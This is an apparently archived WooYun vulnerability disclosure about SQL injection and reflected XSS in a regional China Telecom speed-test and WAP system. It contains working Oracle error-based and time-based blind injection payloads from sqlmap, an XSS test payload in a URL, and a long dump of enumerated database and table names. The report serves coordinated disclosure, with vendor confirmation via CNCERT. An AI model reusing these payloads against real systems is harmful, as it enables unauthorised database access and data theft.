当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0149099

漏洞标题:某地区电信某处存在SQL注入/可XSS弹窗(4库)

相关厂商:中国电信

漏洞作者: Hackshy

提交时间:2015-10-26 16:03

修复时间:2015-12-14 16:42

公开时间:2015-12-14 16:42

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-26: 细节已通知厂商并且等待厂商处理中
2015-10-30: 厂商已经确认,细节仅向厂商公开
2015-11-09: 细节向核心白帽子及相关领域专家公开
2015-11-19: 细节向普通白帽子公开
2015-11-29: 细节向实习白帽子公开
2015-12-14: 细节向公众公开

简要描述:

中国电信啊,很早就发现了,交一下吧。

详细说明:

注入地址:

http://**.**.**.**/nos/speedtest/saveuserinfo.jsp?account=

(WDXX`3E04A}U97Z}J02HKB.png

DR75MA7RH6AM3AHQ0L)574K.png

X0NRHOFF_SYN_}{6HNUQB19.png


再交一处XXS:

http://**.**.**.**/gxwap/fluxList.do?typeId=2<script>alert('wooyun')</script>

T$77A7FT]UQ_F]T2OJ]N4[H.png

漏洞证明:

跑出来的表:

Parameter: account (GET)
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: account=%00' AND 7775=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(113)||CHR(106)||CHR(113)||(SELECT (CASE WHEN (7775=7775) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(112)||CHR(107)||CHR(118)||CHR(113)||CHR(62))) FROM DUAL) AND 'jhMO'='jhMO
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: account=%00' AND 9590=DBMS_PIPE.RECEIVE_MESSAGE(CHR(73)||CHR(77)||CHR(84)||CHR(76),5) AND 'xkha'='xkha
---
web application technology: JSP
back-end DBMS: Oracle
Database: SYS
[12 tables]
+--------------------------------+
| DUAL |
| AUDIT_ACTIONS |
| IMPDP_STATS |
| KU$NOEXP_TAB |
| ODCI_SECOBJ$ |
| ODCI_WARNINGS$ |
| PLAN_TABLE$ |
| PSTUBTBL |
| STMT_AUDIT_OPTION_MAP |
| SYSTEM_PRIVILEGE_MAP |
| TABLE_PRIVILEGE_MAP |
| WRI$_ADV_ASA_RECO_DATA |
+--------------------------------+
Database: SLVIEW
[507 tables]
+--------------------------------+
| MODULE |
| ACCESSRAWINFO |
| ACCESSSTATINFO |
| ADDRSECTION |
| ADRATEMOD |
| ADSLSNMPDEPLOY |
| AGENTSERVER |
| AGENTSERVERTYPE |
| ANPORTPERFSUMMON |
| ANPORTPERFSUMWEEK |
| APSCIRCUIT |
| AREADSLAMPORTCOUNT |
| AREAINFO |
| AREATESTPATH |
| AUDITDRIVERASSIGNRULE |
| BASDNSCOM |
| BASDNSCOMMAP |
| BASTAGMONIDAILYINFO |
| BASTAGMONIHOURLYINFO |
| BASTAGMONIRAWINFO |
| BATCHWS |
| BBACCESSTYPE |
| BBUSERTYPE |
| BGPAS |
| BRASDROPRATEDAILY |
| CABLE |
| CARDEXTINFO |
| CARDEXTINFOCFG |
| CARDINFO |
| CARDINFOCHANGE |
| CARDMAINTAINRECORD |
| CFGDRIVERASSIGNRULE |
| CFGDRIVERINSTANCE |
| CIRCUIT |
| CIRCUITEXTCFG |
| CIRCUITTYPE |
| CIRENDSTYPE |
| CIRPROP |
| CIRSTATMETHOD |
| CIRSTATTYPE |
| CIRSTATTYPEDEF |
| CIRSTATTYPEDETAIL |
| CIRTRANSTYPE |
| CIRTYPELEVELCONF |
| CITYCODE |
| CITYCODEMAP |
| CITYDAILYJITTER |
| CITYDAILYPERF |
| CITYHOURLYPERF |
| CITYMONTHLYPERF |
| CITYNODECFG |
| CITYRAWPERF |
| CITYRAWPERF_TMP |
| CN2SERVIPVPDN |
| CODEBOOK |
| COLTYPE |
| COMPAREFILERECORD |
| COMPLETEDWSTONOTICE |
| CONVERTCFG |
| CURRENTPARTS |
| CUST |
| CUSTEXTINFO |
| CUSTLEVEL |
| CUSTMANAGER |
| CUSTRESRELA |
| CUSTSERVEXTINFO |
| CUSTSERVEXTINFOCFG |
| CUSTSERVTYPE |
| CUSTTYPE |
| DATACONVERTRULE |
| DEVADDR |
| DEVADDREXT |
| DEVBUSIACTOR |
| DEVCURVTYSESSNUM |
| DEVEXTINFO |
| DEVEXTINFO2 |
| DEVEXTINFOCFG |
| DEVEXTINFOCFG2 |
| DEVICE |
| DEVICEACCOUNT |
| DEVICEDETAILMODEL |
| DEVICEMODEL |
| DEVICEMODELLIB |
| DEVICEPROP |
| DEVICESUPPLIER |
| DEVICETYPE |
| DEVICETYPELIB |
| DEVICEVENDOR |
| DEVIOSCHANGE |
| DEVIPPOOL |
| DEVMODELMONICFG |
| DEVONLINEOPERLOG |
| DEVONLINEOPERTYPE |
| DEVONLINESTATUS |
| DEVUSEDALARMDEF |
| DEVUSEDALARMLEVEL |
| DHC |
| DHCCATINFO |
| DHCEXTENDCFG |
| DHCEXTINFO |
| DHCEXTINFOCFG |
| DHC_TAB |
| DISCDRIVERASSIGNRULE |
| DISCOVEREDIPADDRESS |
| DOCTYPE |
| DROPRATE |
| DROPRATERAW |
| DROPRATESUM |
| DSLAMAPPLYPROFILETYPE |
| DSLAMLOSTPROFILE |
| DSLAMPORTINSCOL |
| DSLAMPORTINSUNQUALIF |
| DSLAMPORTLATESTCON |
| DSLAMPORTPARACUR |
| DSLAMPORTPARAEXAM |
| DSLAMPORTPARASNAPSHOT |
| DSLAMPORTPARATHRESHOLD |
| DSLAMPORTRATEZONE |
| DSLAMPORTTEST |
| DSLAMPORTUNQUALITIME |
| DSLAMSERVPROFILE |
| E8PVCPARA |
| EMS |
| EMSCURVTYSESSNUM |
| EMSSCOPE |
| ENGINEERINFO |
| ERRLOGINFO |
| EXCLUSIVEFUNCS |
| EXIDEVIPPOOL |
| EXIIPPOOLCONFLICT |
| EXTCIRCUIT |
| EXTCIRCUITDETAIL |
| EXTMONIITEMCOLCFG |
| FAVORFUNC |
| FBINTERFACE |
| FBINVOKERECORD |
| FPCIRMATCHRULE |
| FUNCGROUP |
| FUNCGROUPCATCFG |
| FUNCINFO2 |
| FUNCPAGES |
| FUNC_ROLE |
| GROUPFUNCRELA |
| GROUPPORTINFO |
| GRP |
| GRPITEMPARAGRPSCHM |
| GRPITEMPARAGRPSCHMDETAIL |
| GRPTYPE |
| GXMAINLOGINFO |
| HELPDIRKBDOMAP |
| HOST |
| HOSTACCOUNT |
| HOSTADDR |
| HOSTEXTINFO |
| HOSTEXTINFOCFG |
| HOSTPROCESSSTATUS |
| HOSTPROP |
| HOSTTYPE |
| HWCLASS |
| HWMODEL |
| HWTYPE |
| HWTYPEBYMODEL |
| IPADDRESSSEC |
| IPBINDRULEINFO |
| IPBINDRULETYPE |
| IPPOOLCONFLICT |
| IPSYN |
| IPV6ADDRSECT |
| IPV6DEVADDR |
| IPV6HOSTADDR |
| IRPT_CHECKPOLICYINFO |
| IRPT_COMP_MUTISHEET |
| IRPT_COMP_SHEETTEMPLET |
| IRPT_COMP_SUBTEMPLET |
| IRPT_COMP_TEMPLET |
| IRPT_DATABASE |
| IRPT_DATAMODEL |
| IRPT_DATAMODEL_FULLSQL |
| IRPT_DATAMODEL_SQL |
| IRPT_DATAMODEL_TYPE |
| IRPT_DAY |
| IRPT_FILTER_OPERATION |
| IRPT_ITEM |
| IRPT_ITEM_TRAN |
| IRPT_PICTYPE |
| IRPT_SUBJECT |
| IRPT_SUBJECT_CALCULATE |
| IRPT_SUBJECT_CALCULATE_ONLINE |
| IRPT_SUBJECT_CONDEF |
| IRPT_SUBJECT_DIM |
| IRPT_SUBJECT_FILTER |
| IRPT_SUBJECT_FILTERREL |
| IRPT_SUBJECT_MEASURE |
| IRPT_SUBJECT_MEASURE_ONLINE |
| IRPT_SUBJECT_PIC |
| IRPT_TEMPLET_LIMITREL |
| IRPT_TEMPLET_LIMITREL_ONLINE |
| IRPT_TEMPLET_LIMITVALUE |
| IRPT_TEMPLET_LIMITVALUE_ONLINE |
| IRPT_TEMPLET_VALUE |
| IRPT_TEMPLET_VALUE_ONLINE |
| IRPT_WEEK |
| ITEMGROUP |
| ITEMGROUPDETAIL |
| ITE_SG_USERRELA |
| KBCOL |
| KBCOLATTACH |
| KBCOLDETAIL |
| KBDOCATTACH |
| KBDOCUMENT |
| KBDOMAIN |
| KBFAULTHANDLE |
| KBKEYWORDRECORD |
| KBKEYWORDRELA |
| KBREPOSITORY |
| KEYPROCESSDEF |
| LGSRCCONFIG |
| LINETESTRESULT |
| LNSCURSTAT |
| LNSINFO |
| LNSSTATH |
| LNSTESTCFG |
| LNSTESTPDSNCFG |
| LPEXTINFO |
| LPEXTINFOCFG |
| LPINFO |
| MODULELICENSECFG |
| MONITORPAGEDEF |
| MONITORPAGENUMLIMIT |
| MRTGCFGFILE |
| MR_CVPORTTYPE |
| NET |
| NETSCDATACHECK |
| NETSCDATADELAPPLY |
| NETSCDATADELBACKUP |
| NETSCDATADELOBJ |
| NETSCDIAG |
| NETSCDIAGREF |
| NETSCDIRECTION |
| NETSCITEM |
| NETSCITEMCFG |
| NETSCITEMCFGCONF |
| NETSCPERFD |
| NETSCPERFH |
| NETSCRELA |
| NETSCRESTYPE |
| NETSCTDSEC |
| NETSCUSERTYPE |
| NETSCWEBSITE |
| NMSNODEIPBRANCHMAP |
| NMSRESDATA |
| NOBUSYNETSCPERFD |
| NODE |
| NODELEVEL |
| NODEMAPFORWH |
| NODERESRELA |
| OMITCIR |
| ONLINESPANSTAT |
| ONLINEUSER |
| OPERLOGINFO |
| OPERLOGMODULE |
| OPERTYPE |
| OPERTYPEMAP |
| PAGEGUIDECONF |
| PAGELOGINFO |
| PAGEMODULE |
| PARTITIONCLEANCFG |
| PARTITIONERRORLOG |
| PARTITIONOPERLOG |
| PARTSHISTORY |
| PERFPARACFG |
| PMHOST |
| PMSTATUS |
| POLGRPPINGCONF |
| POLICYGROUPINFO |
| PONCFG |
| PORTBANDWIDTHCLASS |
| PORTINFO |
| PORTINFOCHANGE |
| PORTRATECFG |
| PORTRATEDAILY |
| PORTRATEDETAILMON |
| PORTRATEMONTH |
| PORTRATERAW |
| PORTRATESUM |
| PORTSPEEDSTAT |
| PORTVLANRELA |
| PPEXTINFO |
| PPEXTINFOCFG |
| PPINFO |
| PROBEAGENTCFG |
| PROBEHOST |
| PROBEIP |
| PROBERES |
| PROBERESTRICTIONS |
| PROVIDER |
| PROVIDERQOSLEVELMAPPING |
| PROVIDERQOSMODE |
| PROVIDERTYPE |
| PROVINCEINFO |
| QOSCLASS |
| QOSCLASSMAP |
| QOSPOL |
| QOSPOLDEPLOY |
| QOSPOLTYPE |
| QOSPOLTYPECHAR |
| QOSPORTANALYZE |
| QOSPORTANCLASS |
| QOSQUEUE |
| QUERYPAGEDISPCONF |
| REPORTRESMATCHRULE |
| REPORTTEMPTABLE |
| RES |
| RESCFGCOLITEM |
| RESCLASS |
| RESCOLITEMPROFILE |
| RESCOLPROGCFG |
| RESCOLTIMEPLAN |
| RESCOLTIMEPLANDETAIL |
| RESCURINFO |
| RESGROUP |
| RESMONICURINFO |
| RESMONIDAILYINFO |
| RESMONIDERIVEDITEMCFG |
| RESMONIHOURLYINFO |
| RESMONIITEMCFG |
| RESMONIITEMCOLCFG |
| RESMONIITEMLIB |
| RESMONIMONTHLYINFO |
| RESMONIRAWINFO |
| RESMONITHRESHOLD |
| RESPARATAG |
| RESPARATAGFULL |
| RESRELATION |
| RESSTATCURINFO |
| RESSTATHISINFO |
| RESSTATITEMCFG |
| RESSTATTIME |
| RESSTATTIMERELA |
| RESSUMBP |
| RESSUMGROUP |
| RESTAG |
| RESTAGFULL |
| RESTYPE |
| RESUPDATE |
| RESVALIDHIS |
| RESVENDOR |
| RIGHTMENU2GROUPINFO |
| RIGHTMENUINFO |
| RIGHTMENUPAGERELA |
| RIGHTMENU_ROLE |
| ROLEGROUPRELA |
| ROLEINFO |
| ROLEKBAUTH |
| ROLERPTTEMPLETRELA |
| ROUNDEDIFSPEEDDEF |
| RPTBASRES |
| RPTHIS |
| RPTPAGEDEF |
| RPTPAGEVAL |
| RPTSUBSCRIPTION |
| RPTTEMPLET |
| RPTTEMPLETTYPE |
| RPTTEMPLETTYPELIB |
| RPTTEMPLET_ONLINE |
| RPTTREE |
| RP_DISPTHRESHOLD |
| SAVERESULT |
| SERV |
| SERVADSL |
| SERVAUDITTASKDETAIL |
| SERVCFGPARA |
| SERVCFGTASKDETAIL |
| SERVCFGTASKEXTRATMP |
| SERVCFGTASKPARA |
| SERVCFGTEMPLET |
| SERVCFGTMPDETAIL |
| SERVCHANGE |
| SERVCLASS |
| SERVCUSTIP |
| SERVDISCTASKDETAIL |
| SERVMODEL |
| SERVRPTHIS |
| SERVRPTSUBSCRIPTION |
| SERVRPTTYPE |
| SERVTASKDISASSEMBLECUSTOMIZE |
| SERVTASKLOGDETAILOLD |
| SERVTASKLOGOLD |
| SERVTASKMANOBJECT |
| SERVTASKOLD |
| SERVTASKSCHEDULEOLD |
| SERVTYPE |
| SERVTYPEMAP |
| SGSYSTEM |
| SGSYSTEMOTHERFIELDINFO |
| SGSYSTEMUSERINFO |
| SINGLEUSERNODEAUTH |
| SINGLEUSERRESAUTH |
| SLOTEXTINFO |
| SLOTEXTINFOCFG |
| SLOTINFO |
| SLOTINFOCHANGE |
| SLRELACIR |
| SLSERV |
| SLSERVHIS |
| SPEEDDEFFORPORTTYPECONV |
| SPEEDMAP |
| SPEEDRANGEDEF |
| SPEEDSVRIPRANGE |
| SPEEDSVRIPRANGE0408 |
| SPEEDSVRIPRANGE150319 |
| SPEEDSVRIPRANGE20130410 |
| SPEEDSVRIPRANGE20131107 |
| SPEEDSVRIPRANGE20150129 |
| SPEEDSVRIPRANGE20150316 |
| SPEEDSVRIPRANGEBAK20121111 |
| SPEEDSVRIPRANGEBAK20130115 |
| SPEEDSVRIPRANGEBAK20130316 |
| SPEEDSVRIPRANGEBAK20140425 |
| SPEEDSVRIPRANGEBAKOLD |
| SPEEDTESTFTP |
| SPEEDTESTFTP20130426 |
| SPEEDTESTFTPBAK20130501 |
| SPEEDTESTFTPGJ |
| SPEEDTESTFTPTMP |
| SPEEDTESTFTPTMP |
| SPEEDTESTHTTP |
| SPEEDTESTHTTPGJ |
| SPEEDTESTHTTPTMP |
| SPEEDTESTPING |
| SPEEDTESTPINGGJ |
| SPEEDTESTSVR |
| SPEEDTESTSVRNODE |
| SPEEDTESTUSER |
| SPEEDTESTUSERTMP |
| SPEEDTESTUSRCLASSCFG |
| SPEEDTESTVIDEO |
| SPEEDTESTVIDEOGJ |
| SPEEDTESTWEBSITE |
| STATGROUPDETAIL |
| STATGROUPINFO |
| STATSHOWCONTENT |
| STATSHOWCONTENTD |
| STATSHOWCONTENTRAW |
| STATSHOWCUSTERMIZE |
| STATTIMESCHEME |
| STATTIMESCHEMEDETAIL |
| SUMANAGRP |
| SUMANAGRPDETAIL |
| SYSENTRYLOG |
| SYSPARA |
| TAG |
| TAGEXTDEF |
| TAGEXTRES |
| TAGTEMPLET |
| TAGTREE |
| TAGTREECFG |
| TAGTREECHANGELOG |
| TAGTREENODECODE_RES |
| TAGTREENODERESDEF |
| TAGTYPE |
| TEMPLETPARA |
| TESTRESULTDEFINE |
| TESTRESULTRULE |
| TESTRESULTRULEITEM |
| TESTTYPE |
| TIMESLOTDEFINE |
| TIMESLOTSTAT |
| TIMESPANDEFINE |
| TOPSPSTAT |
| TRUNKLINE |
| UDFSERVCFGTEMPLET |
| UICUSTERMIZE |
| UNQUALIPORTSTAT |
| USERADDRACL |
| USERAUTHMODREC |
| USERAUTHUPDATE |
| USERCUSTMGRRELA |
| USERINFO |
| USERKBAUTH |
| USERMAINPAGECFG |
| USERNODEUPDATE |
| USERORGANIZE |
| USERRESAUTH |
| USERRESUPDATE |
| USERSTATGRPVIEWAUTH |
| USERTAGTREEAUTH |
| USERTEMPLETCFGAUTH |
| USERTEMPLETUSEAUTH |
| USER_ROLE |
| VIDEOTESTFILE |
| VIDEOTESTFILETYPE |
| VLAN |
| VLANPORT |
| VLANPORTRELA |
| VPNBGPTEMPMODOPERLOG |
| VPNQOSPOLICY |
| VPNQOSUDFMATCHRULE |
| VRRPGROUP |
| WEBSERVICELOG |
| WORKSHEETEXTCFG |
| WORKSHEETEXTDISPCFG |
| WORKSHEETRELA |
| WREDPARACFG |
| WSEXTRATMP |
| WSEXTRATMPPARA |
| XMLRAWINFO |
+--------------------------------+
Database: OLAPSYS
[9 tables]
+--------------------------------+
| CWM2$AWCUBECREATEACCESS |
| CWM2$AWDIMCREATEACCESS |
| CWM2$_AW_NEXT_TEMP_CUST_MEAS |
| CWM2$_AW_TEMP_CUST_MEAS_MAP |
| CWM2$_TEMP_VALUES |
| OLAP_SESSION_CUBES |
| OLAP_SESSION_DIMS |
| XML_LOAD_LOG |
| XML_LOAD_RECORDS |
+--------------------------------+
Database: SYSTEM
[7 tables]
+--------------------------------+
| DEF$_TEMP$LOB |
| MVIEW$_ADV_INDEX |
| MVIEW$_ADV_OWB |
| MVIEW$_ADV_PARTITION |
| OL$ |
| OL$HINTS |
| OL$NODES |
+--------------------------------+


不深入了。

修复方案:

过滤

版权声明:转载请注明来源 Hackshy@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-10-30 16:40

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向中国电信集团公司通报,由其后续协调网站管理部门处置.

最新状态:

暂无